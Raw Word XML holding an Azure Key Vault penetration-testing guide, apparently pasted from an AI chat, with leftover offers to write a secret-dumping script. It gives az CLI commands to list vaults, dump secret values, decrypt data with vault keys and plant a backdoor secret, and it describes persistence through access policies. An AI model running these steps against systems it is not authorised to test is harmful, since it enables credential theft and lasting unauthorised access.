          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31ECB190" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Certificate Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6064B934" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>get on certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1321DC35" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Extract certificates &amp; private keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0046162E" w:rsidRPr="00436C36" w14:paraId="3CE07B0A" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C03617" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Misconfigured Access Policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DE7EAF1" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Wildcard principal or overly broad access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="552D108B" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00436C36">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Persist or escalate access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ADD009C" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="297786F5">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D0935" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Would you like me to generate a script to automate Azure Key Vault enumeration and secret dumping for offensive security testing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01071A5D" w14:textId="77777777" w:rsidR="0046162E" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088B08AD" w14:textId="77777777" w:rsidR="0046162E" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D892BD" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Here’s your summarized and rewritten version in the context of Azure Pentesting, covering Azure Key Vault and Key Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0782435A" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="698121B2">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E9808"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Azure Key Vault &amp; Secret Management - Pentesting Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FB378E" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Azure Key Vault securely stores secrets, keys, and certificates. It integrates with Azure services to protect sensitive data and supports hardware-backed key management via Azure-managed or customer-managed keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F3BD2" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="19F68873">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6BD14" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC0A7A4"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Key Vault Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC36B1" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault list -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFADE5F" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Enumerates all accessible key vaults under the current Azure subscription/account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31B396"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Listing Secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C34980" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret list --vault-name &lt;vault-name&gt; -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE77C54"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Getting Secret Value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119991A3" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret show --vault-name &lt;vault-name&gt; --name &lt;secret-name&gt; --query value -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B74DC14" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>If misconfigured, this can reveal sensitive credentials like tokens, connection strings, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2BB824"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Listing Keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714424DA" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault key list --vault-name &lt;vault-name&gt; -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E46AEFD" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Describing a Key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3FA0C" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault key show --vault-name &lt;vault-name&gt; --name &lt;key-name&gt; -o json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C8BE8"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Check Access Policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E00C30" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault show --name &lt;vault-name&gt; --query "properties.accessPolicies"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13405D2A" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Identifies which users or apps have access to secrets or keys (important for lateral movement or privilege escalation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2742D1ED" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="21DD7500">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="497C3761" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D656C9D"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Secret Dumping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77049DD8" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>If the authenticated user has get permissions, secrets can be dumped and used to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07286D5F" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Access APIs, databases, or other cloud services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F87967" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Pivot into internal environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B563E7B"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Key Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A7DB42" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Stolen encrypted blobs (e.g., from Azure Storage or SQL) can be decrypted if attacker has access to the associated Key Vault keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093665E" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault key decrypt --vault-name &lt;vault-name&gt; --name &lt;key-name&gt; --algorithm RSA-OAEP --value &lt;base64-ciphertext&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CAF37F" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Note: For symmetric keys, decryption is typically performed via Azure services like SQL or Storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EC36AF" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="47DE56F1">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFAD8D4"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Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5CFD3A" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>An attacker with sufficient permissions could:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B8D75" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Create new secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1EB737" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Replace existing secrets with malicious payloads (e.g., backdoored credentials)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B67A088" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Add new access policies granting themselves continued access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31865C4C" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az keyvault secret set --vault-name &lt;vault-name&gt; --name evilsecret --value hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F8FC0" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="00000000" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="37BA4281">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A7ECF" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test Script (Python):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2F9EAC" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00436C36">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>automated Key Vault enumeration and secret dumping script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to speed up your testing process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6ED4C" w14:textId="77777777" w:rsidR="0046162E" w:rsidRPr="00436C36" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C36">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Would you like a similar script for keys or certificates in Azure Key Vault?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2A5B05" w14:textId="77777777" w:rsidR="0046162E" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F2A390" w14:textId="77777777" w:rsidR="0046162E" w:rsidRDefault="0046162E" w:rsidP="0046162E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24DC25A5" w14:textId="77777777" w:rsidR="001833C8" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9CEE01" w14:textId="77777777" w:rsidR="001833C8" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Key vaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6365A5" w14:textId="77777777" w:rsidR="001833C8" w:rsidRDefault="001833C8" w:rsidP="001833C8"/>
    <w:p w14:paraId="4F3F3725" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serverless and Cloud Services in Azure Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473355DE" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:r w:rsidRPr="00D60277">
        <w:t>In Azure, serverless computing, identity management, and cloud infrastructure provide both opportunities and challenges for penetration testers. Here are key areas of focus in an Azure PenTest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1771EDCF" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Azure Functions (Serverless Apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BCCE9B" w14:textId="77777777" w:rsidR="001833C8" w:rsidRPr="00D60277" w:rsidRDefault="001833C8" w:rsidP="001833C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment Variables and Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve">: Serverless applications in Azure (Azure Functions) often use environment variables for configuration. While Azure best practices recommend using </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Key Vault</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60277">
        <w:t xml:space="preserve"> to securely store secrets, it's common to find plaintext values (e.g., connection strings) stored directly in the environment variables or within source code.</w:t>
      </w:r>
    </w:p>
